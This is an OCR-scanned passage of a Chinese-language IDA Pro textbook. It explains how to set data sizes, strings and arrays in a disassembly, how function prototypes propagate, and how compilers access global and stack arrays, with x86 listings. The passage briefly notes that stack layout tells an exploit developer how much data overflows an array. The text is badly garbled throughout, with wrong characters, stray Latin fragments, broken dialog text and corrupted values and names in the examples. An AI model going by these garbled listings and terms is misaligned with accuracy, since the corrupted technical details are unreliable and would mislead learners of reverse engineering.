在 下 面 的 几 节 中 ， 我 们 将 讨论 可 以 对 反 汇 编 代 码 清单 中 的 数据 执行 的 一 些 基本 转换 。 


7.4.1 指定 数据 大 小 


调整 数据 的 大 小 是 修改 该 数据 的 最 简单 方法 。 IDA 提 供 了 许多 数据 大 小 /类 型 说 明 符 。 最 常见 
的 说 明 符 包括 db 、dw 和 dd， 分 别 代 表 1 字 节 、2 字 节 和 4 字数 据 。 第 一 种 更 改 数据 大 小 的 方法 是 
使 用 如 图 7-8 所 示 的 Options > Setup Data Types ( WET » 设置 数据 类 型 ) 对 话 框 。 


Immediately convert the Use the following types 
current item to: in the data carousel: 


Vim. 
Word | jv 2Word 
Double word | [V 3Double word 


Float [ 4Float 


Quadro word | [ 5 Quadro word 
Double 厂 5Double 
Tbyte | [ zTbyte 
Packed real | [ 8Packedreal 
Octa word | [ SOctaword (16bytes) 


[ O Tribyte 















































Tribyte 








图 7-8 数据 类 型 设置 对 话 框 
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这 个 对 话 框 分 为 两 个 部 分 。 对 话 框 的 左 侧 是 一 组 按钮 ， 用 于 立即 更 改 当前 选中 的 项 目的 数 
据 大 小 。 对 话 框 的 右 侧 是 一 组 复 选 框 ， 用 于 配置 IDA 中 所 谓 的 数据 转盘 ( data carousel )。 值 得 注 
意 的 是 ， 左 侧 的 每 一 个 按钮 ， 在 右 侧 都 有 一 个 对 应 的 复 选 框 。 数 据 转 盘 是 一 个 不 断 循环 的 数据 
类 型 列表 ， 其 中 仪 包含 选中 的 复 选 框 所 代表 的 数据 类 型 。 修 改 数据 转盘 的 内 容 并 不 会 立即 影响 
IDA 的 显示 。 而 当 我 们 右 击 一 个 数据 项 上 时， 数据 转盘 中 列 出 的 每 一 种 数据 类 型 都 会 在 上 下 文 羡 
单 中 出 现 。 因 此 ， 将 数据 重新 格式 化 为 数据 转盘 中 的 类 型 比 格式 化 为 数据 转盘 以 外 的 类 型 要 人 简 
单 。 根 据 岁 7-8 中 选择 的 数据 类 型 ， 右 击 一 个 数据 项 ， 你 可 将 这 个 数据 项 重新 格式 化 为 字 季 、 字 
或 双 字 数据 。 

数据 转盘 这 一 名 称 源 目 于 相关 的 数据 格式 化 热 键 D 的 行为 。 按 下 D 键 后 ， 当 前 选中 地 址 所 在 
的 数据 项 被 重新 格式 化 为 数据 转盘 列表 中 的 下 一 种 数据 类 型 。 以 前 面包 含 3 个 数据 项 的 列表 为 例 ， 
当前 格式 为 db 的 项 被 切换 为 sw， 格式 为 dw 的 项 被 切换 为 4d， 格式 为 dd 的 项 被 切换 为 ds， 从 而 完成 
了 转盘 的 循环 过 程 。 对 一 个 非 数 据 项 〈 如 代码 ) 使 用 格式 化 热 键 ,该 项 将 被 格式 化 为 转盘 列表 中 
的 第 一 种 数据 类 型 ( 本 例 中 为 db )。 

切换 数据 类 型 会 使 数据 项 目 变 大 、 缩 小 或 保持 不 变 。 如 果 一 个 项 目的 大 小 保持 不 变 ， 那 么 ， 
你 能 够 观察 到 的 唯一 变化 是 格式 化 数据 的 方式 的 变化 。 如 果 你 缩小 某 个 项 , 例如， 由 dd (AS m) 
转换 成 db ( 1 学 市 )， 则 额外 的 字 广 (这 里 为 3 学 方 ) 将 变 成 未 定义 宇和 节 。 如 有 果 你 增 大 某 个 项 ， 且 
该 项 之 后 的 字 广 为 已 定义 字 方 ， 这 时 ，IDA 会 委婉 地 提醒 你 : 是 否 希 望 取消 下 一 个 项 的 定义 ， 以 
扩大 当前 的 项 。 这 时 , IDA 显 示 的 消息 为 :“ 直 接 转 换 成 数据 吗 ? ”通常 ， 这 条 消息 表示 IDA 会 取 
消 随后 足够 多 的 项 目的 定义 ， 以 满足 你 的 要 求 。 例 如 ， 将 字 市 数据 ( db ) 转换 为 双 字 数据 (dd) 
时 ， 还 需要 男 外 3 学 市 才能 构成 新 的 数据 项 。 

你 可 以 对 任何 描述 数据 (包括 栈 变 量 ) 的 位 置 指定 数据 类 型 和 大 小 。 要 更 改 栈 分 配 的 变量 的 
大 小 ， 首 先 双 击 你 希望 修改 的 变量 ,打开 详 细 栈 帧 视图 ， 然 后 修改 变量 的 大 小 。 


7.4.2 ABE B 

IDA 能 够 识别 大 量 字符 串 格 式 。 默 认 情 况 下 ，IDA 会 搜索 并 格式 化 C 风 格 、 以 空 字符 结尾 的 字符 
串 。 要 强制 将 数据 转换 为 字符 串 ， 可 以 通过 Edit ”Strings 菜 单 中 的 选项 ,选择 一 种 字符 串 风 格 。 如 果 
当前 选中 地 址 开始 部 分 的 字 节 构成 了 一 个 选 定 风 格 的 字符 串 ，IDA 会 将 这 些 字 节 合 并 在 一 起 ， 组 成 

个 单字 符 串 变量 。 任 何 时 候 ， 你 都 可 以 使 用 热 键 A 以 默认 的 字符 串 风格 对 当前 选中 的 位 置 进行 格 
式 化 。 

有 两 个 对 话 框 可 用 于 配置 字符 串 数 据 。 第 一 个 对 话 框 如 图 7-9 所 示 ， 通 过 Options > ASCH 
String Style 命 令 即 可 打开 该 对 话 框 , ASCII 在 这 里 有 些 用 词 不 当 , 因为 IDA 能 够 理解 许多 其 他 字符 
EB XUI o 

与 “数据 类 型 配置 ”对 话 框 类 似 , 左 侧 的 按钮 用 于 在 当前 选中 的 位 置 创 建 一 个 指定 风格 的 字 
符 串 。 只 有 当前 位 置 的 数据 符合 指定 的 字符 串 格 式 , 才能 创建 字符 串 。 对 于 以 字符 结尾 的 字符 串 ， 
可 以 在 对 话 框 的 底部 指定 两 个 终止 符 。 对 话 框 右 侧 的 单 选 按钮 用 于 指定 字符 串 热 键 CA) 的 默认 
字符 串 风 格 。 
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图 7-9 ”字符 串 数据 配置 


第 二 个 用 于 配置 字符 串 操 作 的 对 话 框 如 图 7-10 所 示 ， 通 过 Options >» General 可 打开 该 对 话 框 ， 
再 单 击 上 面 的 Strings 选 项 卡 即 可 在 这 里 配置 其 他 与 字符 串 有 关 的 选项 。 虽 然 你 可 以 使 用 下 拉 框 指 
定 默认 的 字符 串 类 型 , 但 是 , 这 里 的 绝 大 多 数 选 项 主要 与 字符 串 数据 的 命名 和 显示 有 关 。 对 话 框 
右 侧 的 Name generation (名称 生成 ) 区 只 有 在 你 选择 了 Generation names ( 生成 名 称 ) 选项 后 才 会 
显示 。 如 果 关 闭 “ 名 称 生成 "， 则 IDA 会 为 字符 串 变 量 提 供 以 asc 为 前 级 的 哑 名 。 


IDA Options 




















图 7-10 IDA 字符 串 选 项 
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如 果 司 用 名 称 生 成 ，Name generation 选 项 将 控制 IDA 如 何 为 字符 串 变 量 生成 名 称 。 如 果 没 有 
选择 Generate serial names ( 生成 序列 名 ， 默 认 设 置 ),， IDA 将 使 用 指定 的 前 级 和 从 字符 串 中 提取 出 
的 字符 ， 生 成 一 个 长 度 不 超过 当前 最 大 名 称 长 度 的 名 称 ， 下 面 的 字符 串 即 是 一 个 例子 : 


.rdata:00402069 aThisIsACharact db 'This is a Character array ,0 


名 称 的 首 字 母 要 大 写 ,， 在 生成 名 称 时 ,任何 禁止 用 在 名 称 中 的 字符 ( 如 空格 ) 将 被 省 略 。 选 
择 Mark as autogenerated (标记 为 目 动 生成 ) 选项 ， 生 成 的 名 称 〈 默 认为 次 蓝 色 ) 将 以 一 种 不 同 于 
用 户 指 定 的 名 称 (默认 为 蓝 色 ) 的 颜色 显示 。Preserve case (保留 大 小 写 ) 强制 名 称 在 字符 串 中 
出 现时 使 用 字符 ， 而 不 是 把 它们 转换 成 首 字母 大 写 。 最 后 ，Generate serial names 会 使 IDA 通 过 在 
名 称 后 附加 数字 后 级 ( 以 数字 开头 ), 对 名 称 进 行 序 列 化 。 生 成 的 后 缀 中 的 数字 由 Width 字 段 控制 。 
根据 图 7-10 中 的 配置 ， 生 成 的 前 3 个 名 称 分 别 为 8000、a001 和 a002。 























7.4.3 指定 数组 


由 高 级 语言 生成 的 反 汇 编 代码 清单 的 一 个 缺点 在 于 ， 它 们 极 少 提 供 有 关 数 组 大 小 方面 的 信 
息 。 在 反 汇 编 代 码 清单 中 ， 如 果 数 组 中 的 每 一 个 元 素 都 必须 在 它 目 己 的 反 汇编 行 上 指定 ， 那 么 ， 
指定 一 个 数组 可 能 需要 大 量 空间 。 下 面 是 位 于 已 命名 变量 unk 402060 之 后 的 数据 声明 。 其 中 只 有 
第 一 个 项 被 指令 引用 ,表明 它 可 能 是 某 个 数组 中 的 第 一 个 元 素 。 通常 ,数组 中 的 其 他 元 素 并 不 直 
接 引 用 ， 而 是 需要 经 过 更 加 复杂 的 索引 计算 ， 通过 其 与 数组 开头 之 间 的 偏 移 量 来 引用 。 




















.rdata:00402060 unk 402060 db 0 X; DATA XREF: sub 401350+8 个 o 
.rdata:00402060 ; Sub 401350+18 个 0 
.rdata:00402061 db 0 

.rdata:00402062 db 0 

.Ydata:00402063 db 0 

.rdata:00402064 db 0 

.rdata:00402065 db 0 

.rdata:00402066 db 0 

.rdata:00402067 db 0 

.rdata:00402068 db 0 

.rdata:00402069 db 0 

.rdata:0040206A db 0 


IDA 提 供 一 些 工具 , 可 将 连续 的 数据 定义 结合 起 来 , 组 成 一 个 单独 的 数组 定义 。 要 创建 数组 ， 
首先 选择 数组 中 的 第 一 个 元 素 ( 这 里 我 们 选择 的 是 unk 402060 )， 然 后 通过 Edit 》 Array 命令 打开 
如 图 7-11 所 示 的 “创建 数组 ”对 话 框 。 如 果 指 定位 置 的 一 个 数据 项 已 经 被 定义 ， 那么 ， 当 你 右 击 
该 项 时 ， 上 下 文 菜 单 中 将 显示 Array 选 项 。 要 创建 的 数组 类 型 由 你 选择 作为 数组 第 一 个 元 素 的 项 
的 数据 类 型 决定 。 在 这 里 ， 我 们 创建 了 一 个 字 节 数组 。 











说 明 D0000000000000000000000000000000000000 
UUDUUUUUD 
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Array element width : 1 
Maximal possible size: ` 416 
Current array size ` 1 
Suggested array size : — 416 


Number of elements | 416 D 
Items on a line | 0 =| {D-max} 
Element width P D (-1-none,ü-auto) 


Options Indexes 
fw Use "dup" construct 1 Decimal 


[ Signed elements (C Hexadecimal 


| Display indexes (€ Octal 


fw Create as array C Binary 





图 7-11 创建 数组 对 话 框 

下 面 是 该 对 话 框 中 用 于 创建 数组 的 字段 。 

O Array element Width (数组 元 素 宽度 )。 这 个 值 表示 各 数组 元 素 的 大 小 ( 这 里 为 1 字 节 )， 
它 由 你 在 打开 对 话 框 时 选择 的 数据 值 的 大 小 决定 。 

口 Maximum possible size (最 大 可 能 大 小 )。 这 个 值 由 自动 计算 得 出 , 它 决 定 在 过 到 为 一 个 
已 定义 的 数据 项 之 前 ， 可 包含 在 数组 中 的 元 素 ( 不 是 字 市 ) 的 最 大 数目 。 你 可 以 指定 一 
个 更 大 的 值 ， 但 这 需要 随后 的 数据 项 为 未 定义 数据 项 ， 以 将 它们 吸收 到 数组 中 。 

O Number of elements (元 素数 量 )。 你 可 以 在 这 里 指定 数组 的 具体 大 小 。 数 组 占用 的 总 字 
节 数 可 通过 “元 素数 量 x 数组 元 素 宽度 ”计算 得 出 。 

O Items on a line〈 行 中 的 项 目 )。 指 定 在 每 个 反 汇 编 行 显示 的 元 素 的 数量 。 通 过 它 可 以 减 
少 显示 数组 所 需 的 空间 。 

O Element width (元 素 宽度 )。 这 个 值 仪 用 于 格式 化 。 当 一 行 显示 多 个 项 目 时 , 它 控制 列 宽 。 

O Use "dup" construct (使 用 重复 结构 )。 这 个 选项 可 将 相同 的 数据 值 合 并 起 来 ， 用 一 个 重 
复 说 明 符 组 合成 一 项 。 

O Signed elements (有 符号 元 素 )。 表 示 将 数据 显示 为 有 符号 还 是 无 符号 的 值 。 

口 Display indexes (显示 索引 )。 使 数组 索引 以 常规 注释 的 形式 显示 。 如 果 你 需要 定位 大 型 
数组 中 的 特定 数据 ， 可 以 使 用 这 个 选项 。 选 择 该 选项 还 将 启用 Indexes 单 选 按钮 ， 这 样 就 
可 以 选择 每 个 索引 值 的 显示 格式 。 

O Create as array (创建 为 数组 )。 不 选择 这 个 选项 似乎 有 性 于 本 对 话 框 的 目的 ， 该 选项 默 
认 人 处 于 选中 状态 。 如 果 你 只 希望 指定 一 定数 量 的 连续 项 目 ， 而 不 是 将 它们 组 合成 一 个 数 
组 ， 即 可 取消 该 选项 。 

接受 图 7-11 中 指定 的 选项 , 可 以 得 到 下 面 的 简单 数组 声明 , 它 是 一 个 名 为 byte_402060 的 学 市 

数组 (db )， 由 416 ( 1A0h ) 个 0 值 构成 。 



































7.5 ”小结 99 


.rdata:00402060 byte 402060 db 1Aoh dup(0) ; DATA XREF: sub 401350+8 个 o 
.rdata:00402060 ; sub 401350+18 个 0 





这 段 代码 唯一 的 作用 就 是 将 这 416 行 反 汇 编 代码 合并 成 单独 一 行 ( 主要 是 因为 使 用 了 重复 结 
构 )。 在 下 一 半 中 ， 我 们 将 讨论 如 何在 栈 帆 中 创建 数组 。 








7.5 ”小结 


本 曹 及 前 一 莉 介 绍 了 IDA 用 户 知 要 执行 的 最 常见 的 操作 。 通 过 修改 数据 库 ， 你 可 以 将 目 己 的 
知识 与 IDA 在 分 析 阶 段 收集 到 的 信息 结合 起 来 ， 生 成 更 加 有 用 的 数据 库 。 和 源 代 码 一 样 ， 有 效 使 
用 名 称 、 分 配 数据 类 型 和 详尽 的 注释 不 仪 可 帮助 你 记忆 分 析 过 程 , 还 可 为 那些 需要 参考 你 的 工作 
的 人 们 提供 极 大 的 帮助 。 在 下 一 章 中 ， 我 们 将 继续 深入 人 研究 IDA 的 功能 ， 了 解 如何 处 理 更 加 复 灯 
的 数据 结构 如 C 结 构 体 表示 的 数据 结构 )， 并 讨论 编译 C++ 代 码 的 一 些 基 础 知识 。 














效 据 类 型 与 数据 结构 








dy 理解 二 进 制程 序 的 行为 ， 首 先 必 须 对 程序 调用 的 库 男 数 进行 分 类 。 调 用 connect 函数 

EÇ 的 C 程 序 要 创建 网 络 连接 , 调用 RegOpenKey 的 Windows 程序 要 访问 Windows 注册 表 。 
但 是 ， 要 了 人 解 如 何 及 为 何 调 用 这 些 函 数 ， 还 需要 进行 其 他 一 些 分 析 。 

了 解 如何 调 用 也 数 ， 百 先 需 要 知道 给 该 函数 传递 哪些 参数 。 以 connect 函数 调用 为 例 ， 除 了 
该 函数 被 调用 这 一 事实 外 ， 更 为 重要 的 是 , 还 需要 了 解 程序 连接 到 的 具体 地 址 。 要 逆 癌 工程 一 个 
国 数 的 签名 〈 该 子 数 所 需 参 数 的 数量 、 类 型 和 顺序 )， 了解 传递 给 该 限 数 的 数据 尤为 关键 ， 这 也 
说 明了 理解 汇编 语言 如 何 操 纵 数 据 类 型 和 数据 结构 的 重要 性 。 

在 本 章 中 ， 我 们 将 讨论 mA 如 何 回 用 户 传 递 数据 信息 ， 数 据 结 构 如 何 存 储 在 内 存 中 ， 以 及 
如 何 访 问 这 些 数据 结构 中 的 数据 。 将 特定 数据 类 型 与 变量 关联 起 来 的 最 简单 方法 是 , 理解 该 变量 
作为 某 个 函数 (我 们 对 该 函数 有 一 定 了 解 ) 的 参数 时 的 用 法 。 如 果 一 个 变量 作为 IDA 拥有 原型 
的 限 数 的 参数 ， 在 分 析 阶 段 ，IDA 会 尽 其 所 能 推 新 出 该 变量 的 数据 类 型 。 如 有 可 能，IDA 会 对 该 
变量 使 用 一 个 从 函数 原型 中 提取 出 的 正式 名 称 ， 而 不 是 为 其 生成 默认 的 哑 名 。 下 面 调用 connect 
国 数 的 反 汇 编 代 码 即 说 明了 这 一 点 : 
































.text :004010F3 push 10h ; namelen 
.text:004010F5 lea ecx, O[ebp«name] 

. text :004010F8 push ecx ; name 

. text : 004010F9 mov edx, € [ebp«s] 

. text :004010FF push edx > 5 

. text : 00401100 call connect 


我 们 看 到 ， 每 个 push 指令 都 用 被 压 入 的 参数 的 名 称 〈 根 据 IDA 对 函数 原型 的 了 解 ) 进行 了 
注释 。 此 外 ，@ 处 的 两 个 局 部 栈 变 量 已 经 用 它们 对 应 的 参数 进行 了 命名 。 多 数 情况 下 , 与 IDA Æ 
成 的 哑 名 相 比 ， 这 些 名 称 能 够 提供 更 多 信息 。 

IDA 传播 来 自 消 数 原型 的 类 型 信息 的 能 力 并 不 仪 限 于 IDA. 类 型 库 中 包含 的 库 男 数 。 只 要 你 
明确 设置 函数 的 类 型 信息 ，IDA 就 可 以 传播 你 的 数据 库 中 任何 丽 数 的 正式 参数 名 称 和 数据 类 型 。 
在 初始 分 析 阶 段 ， 如果 通过 类 型 传播 没有 得 出 其 他 结论 , IDA 会 器 所 有 也 数 参 数 分 配 哑 名 和 一 般 
类 型 int, 任何 时 候 ， 你 必须 使 用 Edit f Functions >» Set Function Type 命令 , WEE KAAP EA 
击 鼠 标 并 在 上 下 文 染 单 中 选择 Set Function Type (或 使 用 热 键 Y ) 来 设置 函数 的 类 型 。 对 于 如 下 
所 示 的 图 数 ， 上 述 操作 将 生成 如 图 8-1 所 示 的 对 话 框 ， 你 可 以 在 其 中 输入 正确 的 困 数 原型 。 
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.text:00401050 ; ======== S U B R O U T I N E ========================= 
. text :00401050 

.text:00401050 ; Attributes: bp-based frame 

. text :00401050 


.text:00401050 foo proc near ; CODE XREF: demo stackframe42AY/p 
. text :00401050 

.text:00401050 arg O = dword ptr 8 

.text:00401050 arg 4 = dword ptr oCh 

.text:00401050 

.text :00401050 push ebp 

.text:00401051 mov ebp, esp 


如 下 所 示 ,，IDA 假 定 了 int 返回 类 型 ,根据 所 使 用 的 ret dám RA Er (eer EI T 
cdecl 调用 约定 ,并 将 其 结合 到 函数 名 称 中 ( 如 我 们 修改 的 那样 )， 同 时 假定 所 有 参数 均 为 int 类 
型 。 由 于 我 们 尚未 修改 参数 名 称 ，IDA 仪 显示 它们 的 类 型 。 








FE 9 x 
Please enter the type dedaration | int ` ed foo(int, int) -] 
L sl cre | e | 





图 8-1 设置 函数 的 类 型 


如 果 我 们 将 该 原型 修改 为 int cdecl foo(float f. char *ptr), IDA 将 自动 为 该 函数 插入 
原型 注释 (O) 并 在 反 汇 编列 表 中 更 改 参数 名 称 〈@@ )， 如 下 所 示 : 


.text:00401050 ; -------- SU B R OU T I N E ========================= 
. text :00401050 

.text:00401050 ; Attributes: bp-based frame 

. text : 00401050 

.text:00401050 0; int cdecl foo(float f, char *ptr) 





.text:00401050 foo proc near ; CODE XREF: demo stackframe42AY/p 
. text :00401050 

.text:00401050 Of - dword ptr 8 

.text:00401050 Optr = dword ptr oCh 

. text :00401050 

. text :00401050 push ebp 

. text :00401051 mov ebp, esp 


最 后 , IDA 会 癌 新 修改 的 图 数 的 所 有 调用 方 传 播 这 些 信 息 ， 从 而 改进 对 此 处 显示 的 所 有 相关 
呐 数 调用 的 附加 说 明 。 请 注意 ， 在 调用 函数 中 ， 参 数 名 称 f 和 ptr 已 作为 注释 ( @ ) 进行 传播 ， 
并 对 之 前 使 用 哑 名 的 变量 ( @ ) 进行 了 重 命名 。 











.text:004010AD mov eax, [ebprOptr] 

. text :004010B0 mov [esp+4], eax 6; ptr 
. text :004010B4 mov eax, [ebp+@f | 

. text :004010B7 mov [esp], eax e; f 


. text: 004010BA call foo 
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3& [n] Si ALIS E PRA, IDA 通常 已 经 知道 被 调用 子 数 的 原型 了 。 在 这 种 情况 下 ,将 光标 放 在 
函数 名 称 上 ， 你 就 可 以 轻易 查看 该 函数 的 原型 。" 如 果 IDA 不 知道 该 函数 需要 哪些 参数 ， 此 时 你 
gi ABB SEA PRA FERA ER CUL Imports 窗口 )。 如果 发 生 这 种 情况 ,你 最 好 通过 相关 手册 
或 其 他 可 用 的 API 文 档 (如 MSDN 在 线 文档 ” ) 了 解 该 函数 的 行为 。 如 果 所 有 其 他 资源 都 无 法 提 
供 帮 助 ， 你 还 可 以 搜索 Google, 

在 本 章 的 剩余 部 分 , 我 们 将 讨论 如 何 确定 程序 何 时 使 用 数据 结构 , 如 何 解析 这 些 结构 的 组 织 
布局 ， 以 及 如 何 利 用 DA 来 提高 包含 这 类 结构 的 反 汇 编 代码 清单 的 可 读 性 。 由 于 C++ 类 是 CZ 
构 体 的 一 种 复杂 扩展 ， 在 本 章 末 尾 ， 我 们 将 讨论 如 何 逆 癌 工 程 已 编译 的 C++ 程序 。 


8.1 识别 数据 结构 的 用 法 


里 然 基本 数据 类 型 通 弟 能 够 与 CPU 寄存 通 或 指令 操作 数 的 大 小 很 日 然 地 适应 但是， 要 访 
问 复合 数据 类 型 ( 如 数组 和 结构 体 ) 所 包含 的 各 数据 项 ， 则 需要 更 加 复杂 的 指令 序列 。 在 讨论 改 
iU ( 其 中 包含 复杂 的 数据 类 型 ) 可 读 性 的 IDA 功能 之 前 ， 首 先 简单 分 析 一 下 相关 代码 。 






































8.1.1 数组 成 员 访 问 

就 内 存 布局 而 言 , 数组 是 最 简单 的 复合 数据 结构 。 传 统 意义 上 的 数组 指 包 含 同 一 数据 类 型 的 
连续 元 系 的 连续 内 存 块 。 用 数组 中 元 素 的 数量 乘 以 每 个 元 系 的 大 小 , 即 可 直接 计算 出 数组 的 大 小 。 
使 用 CC 语句， 以 下 数组 : 














int array demo[100]; 
Pris Fi er S BREED x 
int bytes - 100 * sizeof(int); 


PARERIK IMRI MELUET TUIIR] , 101-28 5 MEL nl EIE Ett CR t, 如 下 面 这 些 数组 引用 所 示 : 











D 


€ array demo[20] = 15; //fixed index into the array 
for (int i = 0; i < 100; i++) ( 
e array demo[i] = i; //varying index into the array 


} 

在 上 面 的 例子 中 ,假如 sizeof(int) 为 4 字 市 ， 那么 ，@ 处 的 第 一 个 数组 访问 ， 访 问 的 是 数 
组 中 第 80 字 市 位 置 的 整数 值 ; 而 @ 处 的 第 二 个 数组 访问 ， 则 访问 的 是 数组 中 偏 移 量 为 0、4、8… 
96 字 节 位 置 的 连续 整数 值 。 在 编 详 时 ， 第 一 个 数组 访问 的 偶 移 量 可 通过 20x4 计算 出 来 。 多 数 情 

















CD 将 光标 定位 在 IDA 窗口 中 的 任何 名 称 上 , IDA 将 显示 一 个 类 似 于 工具 提示 条 的 弹出 窗口 , 其 中 包含 目标 位 置 多 达 
10 行 的 反 汇 编 代码 。 如 果 该 名 称 为 库 函 数 名 ， 窗 口中 通常 包含 用 于 调用 该 库 函 数 的 原型 。 
@) 参见 http://msdn.microsoft.com/library/。 
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况 下 ， 第 二 个 数组 访问 的 仿 移 量 必须 在 运行 时 计算 ， 因 为 循环 计数 带 i 的 值 在 编译 时 并 不 固定 。 
此 ， 每 经 历 一 次 循环 ， 都 必须 计算 ix4 的 结果 ， 以 确定 具体 的 偏 移 量 。 最 终 ， 访 问 数 组 元 素 的 
方式 ， 不 仅 取决 于 所 使 用 索引 的 类 型 ， 而 且 取 决 于 数组 在 程序 的 内 存 空 间 中 的 位 置 。 

1. 全 局 分 配 的 数组 

如 琳 一 个 数组 在 程序 的 全 局 数据 区 内 分 配 ( 例如， 在 .data 或 .bss 15 ), bes TENTER nak 
知 该 数组 的 基 址 。 由 于 基 址 固定 , 编译 上 从 可 以 计算 出 使 用 固定 索引 访问 的 任何 数组 元 系 的 固定 地 
址 。 以 下 面 这 个 简单 的 程序 为 例 ， 它 同时 使 用 固定 俩 移 量 和 可 变 侦 移 量 访问 一 个 全 局 数组 : 














int global array[3]; 


int main() { 
int idx = 2; 


global_array[0] = 10; 
global_array[1] = 20; 
global array[2] = 30; 
global array[idx] = 40; 


} 
这 个 程序 的 反 汇编 代码 清单 为 : 


.text:00401000 main proc near 

.text:00401000 

.text:00401000 idx = dword ptr -4 
.text:00401000 

.text:00401000 push ebp 
.text:00401001 mov ebp，esp 

. text :00401003 push ecx 

. text :00401004 mov [ebpridx], 2 

. text :0040100B mov dword 40B720, 10 
. text :00401015 Omov dword 40B724, 20 
. text :0040101F emov dword 40B728, 30 
. text :00401029 mov eax, [ebp+idx] 

. text:0040102C Omov dword 40B720[eax*4], 40 
. text : 00401037 xor eax, eax 

. text : 00401039 mov esp, ebp 

. text: 0040103B pop ebp 

. text :0040103C retn 

.text:0040103C main endp 


Hrs Dë rZebäistä JO OMORE RFR, CERT 3 个 全 局 
变量 。@ 处 对 偏 移 量 的 计算 (eaxx4 ) 是 暗示 全 局 数组 dword 408720 存在 的 唯一 线索 ， 不 过 ， 数 
组 的 名 称 与 @ 处 的 全 局 变量 的 名 称 相同 。 

基于 IDA 分 配 的 哑 名 ， 我们 知道 ， 全 局 数组 由 从 地 址 00408720 开始 的 12 PETAR Eii 
译 过 程 中 ， 编 译 需 使 用 了 固定 索引 (0、1、2 ) 来 计算 数组 中 对 应 元 素 的 具体 地 址 (00408720, 
0040B724 和 0040B728 )， 它 们 使 用 @、@ 和 @ 处 的 全 局 变量 来 引用 。 使 用 上 一 章 讨 论 的 IDA 数组 
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格式 化 操作 (Edit » Array 命令 )， 可 将 dword 408720 转换 成 一 个 三 元 素数 组 ， 从 而 得 到 下 面 的 反 
汇编 行 。 注 意 ， 这 种 特殊 的 格式 化 体现 了 数组 中 偏 移 量 的 使 用 : 


. text :0040100B mov dword 40B720, 10 
. text :00401015 mov dword_40B720+4, 20 
. text :0040101F mov dword 40B720+8，30 








在 这 个 例子 中 ， 有 两 点 需要 注意 。 第 一 , 使 用 常量 索引 访问 全 局 数组 时 ， 在 对 应 的 反 汇 编 代 
但 清单 中 ,对 应 的 数组 元 系 将 以 全 局 变量 的 形式 出 现 。 换 句 话 说, 反 汇 编 代 码 清单 基本 上 不 提供 
任何 数组 存在 的 证 据 。 第 二 , 使 用 可 变 索 引 值 将 市 领 我 们 来 到 数组 的 开头 ， 因 为 在 计算 要 访问 的 
数组 元 素 的 具体 地 址 时 ， 我 们 需要 用 数组 的 基 址 加 上 相应 的 偏 移 量 ， 这 时 基 址 即 呈 现 出 来 (如 @ 
处 所 示 )。@ 处 的 计算 提供 了 另外 一 条 有 关 数 组 的 关键 信息 。 通 过 观察 与 数组 索引 相 乘 的 那个 数 
(这 里 为 4)， 我 们 知道 了 数组 中 各 元 素 的 大 小 〈 不 是 类 型 )。 

2. 栈 分 配 的 数组 

如 果 数 组 是 作为 栈 变 量 分 配 的 , 那 访问 数组 会 有 何不 同 呢 ? 凭 直 和 党 , 我 们 认为 这 肯定 会 有 所 
不 同 , 因为 编译 需 在 编译 时 无 法 获得 绝对 地 址 ， 而 且 即 使 是 使 用 常量 索引 的 访问 也 必须 在 运行 时 
进行 某 种 计算 。 但 实际 上 ， 编 译 器 几乎 以 完全 相同 的 方式 处 理 栈 分 配 的 数组 和 全 局 分 配 的 数组 。 

以 下 面 这 个 使 用 一 个 小 型 栈 分 配 的 数组 的 程序 为 例 : 



































int main() { 
int stack array[3]; 
int idx = 2; 


stack array[O] = 10; 
stack array[1] = 20; 
stack array[2] = 30; 
stack array[idx] = 40; 


j 


在 编译 时 ，stack_array 的 地 址 未 若 ， 因 此 ， 编 详 融 无 法 像 在 前 面 的 全 局 数组 例子 中 一 样 ， 
预先 计算 出 stack_array[1] 的 地 址 。 通 过 分 析 这 个 函数 的 反 汇编 代码 清单 ,我 们 了 解 到 编 详 各 如 
何 访问 栈 分 配 的 数组 : 

.text:00401000 main proc near 

. text : 00401000 


.text:00401000 var 10 
.text:00401000 var C 


dword ptr -10h 
dword ptr -oCh 


.text:00401000 var 8 dword ptr -8 
.text:00401000 idx dword ptr -4 

. text :00401000 

. text : 00401000 push ebp 

. text :00401001 mov ebp, esp 

. text : 00401003 sub esp, 10h 

. text :00401006 mov [ebpridx], 2 


. text : 0040100D Omov [ebp+var_10], 10 
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.text:00401014 mov [ebp+var C], 20 

. text : 0040101B mov [ebp+var 8], 30 

. text : 00401022 mov eax, [ebp+idx | 
.text:00401025 Omov [ebpreax*4*var 10], 40 
. text :0040102D xor eax, eax 

. text :0040102F mov esp, ebp 

. text :00401031 pop ebp 

. text : 00401032 retn 

.text:00401032 main endp 


和 全 局 数组 例子 一 样 ， 这 个 函数 似乎 也 使 用 了 3 个 变量 (var 10, var CH var 8 )， 而 不 是 
一 个 包含 3 个 整数 的 数组 。 根 据 @、@ 和 @@ 处 使 用 的 和 常量， 我 们 得 知 ， 洱 数 似乎 引用 的 是 局 部 变 
tg, 但 实际 上 它 引 用 的 是 stack array 数组 的 3 个 元 素 ， 该 数组 的 第 一 个 元 素 位 于 var 10 ( 内存 
地 址 最 低 的 局 部 变量 ) 所 在 的 位 置 。 

为 理解 编译 硕 如 何 引 用 数组 中 的 其 他 元 素 ,， 首先 看 编译 希 如 何 引 用 stack_array[1]， 它 在 数 
组 中 的 4 宇和 人 位置， 或 者 在 var_10 之 后 的 4k br. TERRI, NL ZE ED ebp-0x10 处 
的 stack array。 编 译 硕 知道 ，stack_array[1] 的 地 址 为 ebp-0x10+4( 可 简化 为 ebp-0x0C )。 结果 ， 
IDA 将 其 作为 局 部 变量 引用 显示 。 最 终 , 与 全 局 分 配 的 数组 类 似 , 使 用 常量 索引 值 会 隐藏 有 栈 分 
配 的 数组 存在 这 一 事实 。 唯 有 @ 处 的 数组 访问 表明 ，var_10 是 数组 中 的 第 一 个 元 素 ， 而 不 是 一 个 
简单 的 整数 变量 。 此 外 ，@ 处 的 反 汇 编 代码 清单 也 有 助 于 我 们 得 出 结论 : 数组 中 各 元 系 的 大 小 为 
berg 

因此 ， 编 译 硕 处 理 栈 分 配 的 数组 和 处 理 全 局 分 配 的 数组 的 方式 非 党 类似。 但是， 从 栈 分 配 的 
数组 的 反 汇 编 代 码 清 单 中 ， 我 们 还 是 可 以 得 到 其 他 一 些 信 息 。 根 据 栈 中 idx 的 位 置 可 以 推断 出 ， 
以 var_10 开始 的 数组 最 多 包含 3 re (gellt, "CIE "dx )。 如 采 你 是 一 名 破解 程序 开发 人 
员 ， 这 些 信息 可 能 极其 有 用 ， 据 此 可 以 确定 ， 要 使 该 数组 溢出 ， 并 破坏 其 后 的 数据 ， 到 底 需 要 在 
数组 中 填充 多 少数 据 。 

